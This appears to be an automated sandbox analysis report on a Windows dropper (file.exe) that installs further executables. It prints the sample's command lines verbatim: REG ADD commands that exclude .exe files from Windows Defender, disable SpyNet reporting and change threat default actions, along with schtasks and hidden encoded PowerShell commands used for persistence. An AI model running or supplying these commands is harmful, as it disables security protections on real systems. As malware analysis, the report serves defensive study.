Windows Analysis Report
file.exe

Overview

General Information

Sample Name: file.exe
Analysis ID: 753408
MD5: e99e15a440798e20c682eb859b3f7885
SHA1: b6f3b87894f51669dede0afe6cb4b504fe0ae614
SHA256: c3dd8a06d395f4772011ed42c0980a54b06915782a06873150462994ed92a712
Tags: exe
Infos:

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Multi AV Scanner detection for domain / URL
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Uses cmd line tools excessively to alter registry or file data
Encrypted powershell cmdline option found
Very long command line found
Suspicious powershell command line found
Performs DNS queries to domains with low reputation
Modifies Group Policy settings
Uses schtasks.exe or at.exe to add and modify task schedules
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
PE file contains sections with non-standard names
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Creates job files (autostart)
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Contains capabilities to detect virtual machines
Uses reg.exe to modify the Windows registry
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Classification

AV Detection
barindex
Multi AV Scanner detection for submitted file
Source: file.exe ReversingLabs: Detection: 39%
Multi AV Scanner detection for domain / URL
Source: service-domain.xyz Virustotal: Detection: 11% Perma Link
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exe Avira: detection malicious, Label: HEUR/AGEN.1250601
Source: C:\Windows\Temp\aoRCsjFoxFbwPJxK\MeXzroudxpEgwUW\RFYnzaH.exe Avira: detection malicious, Label: HEUR/AGEN.1250601
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exe Avira: detection malicious, Label: HEUR/AGEN.1250601
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\7zS2607.tmp\Install.exe ReversingLabs: Detection: 41%
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exe ReversingLabs: Detection: 51%
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exe ReversingLabs: Detection: 51%
Source: C:\Windows\Temp\aoRCsjFoxFbwPJxK\MeXzroudxpEgwUW\RFYnzaH.exe ReversingLabs: Detection: 51%
Uses 32bit PE files
Source: file.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040553A FindFirstFileA, 0_2_0040553A
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004055DE __EH_prolog,FindFirstFileW,AreFileApisANSI,FindFirstFileA, 0_2_004055DE
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Temp\7zS2607.tmp\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Temp\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Temp\7zS2607.tmp\__data__\ Jump to behavior

Networking
barindex
Performs DNS queries to domains with low reputation
Source: DNS query: service-domain.xyz
Source: powershell.exe, 00000011.00000002.412093333.000001A8F98D0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.440371614.000000000287E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000011.00000002.403370580.000001A8F7925000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.micr
Source: powershell.exe, 00000011.00000002.331705203.000001A88156F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.306360805.000001A880270000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.394976607.000001A8901A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.390327444.000001A89006C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000011.00000002.305770495.000001A880203000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.314741800.000001A880EC5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000011.00000002.303899135.000001A880001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.447061574.0000000002F01000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000011.00000002.314741800.000001A880EC5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000011.00000002.305770495.000001A880203000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.314741800.000001A880EC5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000011.00000002.390327444.000001A89006C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000011.00000002.390327444.000001A89006C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000011.00000002.390327444.000001A89006C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000011.00000002.305770495.000001A880203000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.314741800.000001A880EC5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000011.00000002.413168251.000001A8F993B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://go.microsoft.co
Source: powershell.exe, 00000011.00000002.331705203.000001A88156F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.306360805.000001A880270000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.394976607.000001A8901A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.390327444.000001A89006C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000011.00000002.314741800.000001A880EC5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oneget.org
Source: powershell.exe, 00000011.00000002.314741800.000001A880EC5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oneget.orgX
Source: powershell.exe, 00000011.00000002.314741800.000001A880EC5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oneget.orgformat.ps1xmlagement.dll2040.missionsand
Source: unknown DNS traffic detected: queries for: service-domain.xyz

System Summary
barindex
Very long command line found
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exe Process created: Commandline size = 3260
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exe Process created: Commandline size = 3260 Jump to behavior
Uses 32bit PE files
Source: file.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Deletes files inside the Windows folder
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exe File deleted: C:\Windows\SysWOW64\GroupPolicykaNvH Jump to behavior
Creates files inside the system directory
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exe File created: C:\Windows\system32\GroupPolicy\gpt.ini Jump to behavior
Detected potential crypto function
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004162A6 0_2_004162A6
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040E5A5 0_2_0040E5A5
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004126B0 0_2_004126B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00403A01 0_2_00403A01
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00418EF1 0_2_00418EF1
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00418FCB 0_2_00418FCB
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 38_2_02E4C238 38_2_02E4C238
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 38_2_02E4C2C3 38_2_02E4C2C3
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 38_2_02E4C300 38_2_02E4C300
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 38_2_02E4F2B8 38_2_02E4F2B8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 38_2_06269720 38_2_06269720
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 38_2_06279078 38_2_06279078
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 38_2_0627E049 38_2_0627E049
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 38_2_0627E058 38_2_0627E058
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 38_2_06279078 38_2_06279078
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 38_2_06270006 38_2_06270006
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 38_2_06270040 38_2_06270040
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\file.exe Code function: String function: 00403A9C appears 33 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 00413954 appears 179 times
Sample file is different than original file name gathered from version info
Source: file.exe, 00000000.00000000.246681681.0000000000427000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilename7zS.sfx.exe, vs file.exe
Source: file.exe Binary or memory string: OriginalFilename7zS.sfx.exe, vs file.exe
Uses reg.exe to modify the Windows registry
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\7zS2607.tmp\Install.exe 8B691E37EECDDAACD1BB83067CE261157895DEC8302E558C5C9D159C117151A4
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exe A240FDA428ECCA831C7730C83F40BE6F43BB8370F33D8D66D4844B734011C57B
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exe A240FDA428ECCA831C7730C83F40BE6F43BB8370F33D8D66D4844B734011C57B
Source: file.exe ReversingLabs: Detection: 39%
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\file.exe Jump to behavior
Source: file.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\7zS2607.tmp\Install.exe .\Install.exe
Source: C:\Users\user\AppData\Local\Temp\7zS2607.tmp\Install.exe Process created: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exe .\Install.exe /S /site_id "525403"
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exe Process created: C:\Windows\SysWOW64\forfiles.exe C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&
Source: C:\Windows\SysWOW64\forfiles.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exe Process created: C:\Windows\SysWOW64\forfiles.exe C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&
Source: C:\Windows\SysWOW64\forfiles.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\forfiles.exe Process created: C:\Windows\SysWOW64\cmd.exe /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
Source: C:\Windows\SysWOW64\forfiles.exe Process created: C:\Windows\SysWOW64\cmd.exe /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "gbyyEslRl" /SC once /ST 15:13:59 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /run /I /tn "gbyyEslRl"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\gpupdate.exe "C:\Windows\system32\gpupdate.exe" /force
Source: C:\Windows\System32\gpupdate.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\gpscript.exe gpscript.exe /RefreshSystemParam
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /DELETE /F /TN "gbyyEslRl"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "bbsSMGQQDZvgelOgpL" /SC once /ST 19:16:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exe\" DC /site_id 525403 /S" /V1 /F
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exe C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exe DC /site_id 525403 /S
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\reg.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\7zS2607.tmp\Install.exe .\Install.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS2607.tmp\Install.exe Process created: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exe .\Install.exe /S /site_id "525403" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exe Process created: C:\Windows\SysWOW64\forfiles.exe C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64& Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exe Process created: C:\Windows\SysWOW64\forfiles.exe C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64& Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "gbyyEslRl" /SC once /ST 15:13:59 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /run /I /tn "gbyyEslRl" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /DELETE /F /TN "gbyyEslRl" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "bbsSMGQQDZvgelOgpL" /SC once /ST 19:16:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exe\" DC /site_id 525403 /S" /V1 /F Jump to behavior
